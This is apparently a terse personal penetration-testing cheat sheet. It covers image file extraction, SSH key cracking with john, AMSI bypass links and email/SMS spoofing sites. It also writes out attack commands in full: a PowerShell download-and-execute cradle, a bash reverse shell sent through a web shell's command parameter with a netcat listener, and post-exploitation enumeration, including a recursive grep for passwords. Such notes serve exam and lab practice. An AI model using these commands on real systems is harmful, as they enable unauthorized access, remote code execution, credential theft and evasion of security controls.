Look at picture for content
- binwalk file.png
Extract files from image
- binwalk -Me file.png
.priv
chmod 600 key.priv
ssh -i key.priv user@x.x.x.x
python /usr/share/john/ssh2john.py id_rsa > test
john –wordlist=/usr/share/SecLists/Passwords/Leaked-Databases/rockyou-50.txt test
https://github.com/bleubyte/nostromo_nhttpd
https://github.com/MSFT-Security-EMEA/Def4Cloud-Log4J-Demo-Example
http://www.lifeoverpentest.com/ https://backdoorshell.gitbooks.io/oscp-useful-links/ https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/ https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ https://www.tarlogic.com/en/blog/how-to-attack-kerberos/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.thegeekstuff.com/2010/07/execute-shell-script/ https://hashes.org/ https://github.com/blackploit/hash-identifier.git
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
https://www.secjuice.com/powershell-constrainted-language-mode-bypass-using-runspaces/
https://github.com/rasta-mouse?tab=repositories
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://iwantmore.pizza/posts/amsi.html
https://github.com/d0nkeys/redteam/tree/master/code-execution
https://github.com/d0nkeys/redteam
Working AMSI Bypass
https://github.com/aloksaurabh/OffenPowerSh/blob/master/Bypass/Invoke-AmsiBypass.ps1
https://nvd.nist.gov/vuln/search https://www.exploit-db.com/ https://packetstormsecurity.com/ https://www.securityfocus.com/vulnerabilities https://0day.tday http://mvfjfugdwgc5uwho.onion/
https://www.spoofmytextmessage.com/ https://www.spoofmyemail.com/
https://goo.gl tinyurl.com
*check rows & colums stty -a stty rows 34 cols 136
export TERM=xterm
*powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/exploit.html‘)”
*for i in 571 290 911; do nmap -Pn -p $i –host-timeout 201 –max-retries 0 x.x.x.x; done
https://www.acunetix.com/websitesecurity/php-security-2/
in url go to shell.php?command=whoami
In Burpsuite create post request
POST /url/shell.php HTTP/1.1 content command=bash -c ‘bash -i >& /dev/tcp/x.x.x.x/4444 0>&1′
URL encode it to command=bash+-c+’bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261’
Setup NC to listen for incoming connections nc -lvnp x.x.x.x 4444
/etc/init.d/nessusd start https://127.0.0.1:8834
*python -c ‘print “\x47\x49\x46\x38\x37\x61″‘ > test.txt *https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/
hostname
uname -a
Related command cat /etc/issue
ps auxw
netstat -antp
*grep -Ri password | less
#!/bin/bash
#loop by line
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
new_process=$(ps -eo command)
diff <(echo "$old_process") <(echo "$new_process")
sleep 1
old_process=$new_process
done
*check you have read permissions on files ls -la *check to of location you do have write permissions *mkdir writelocation *cp -r /target/folder /writelocation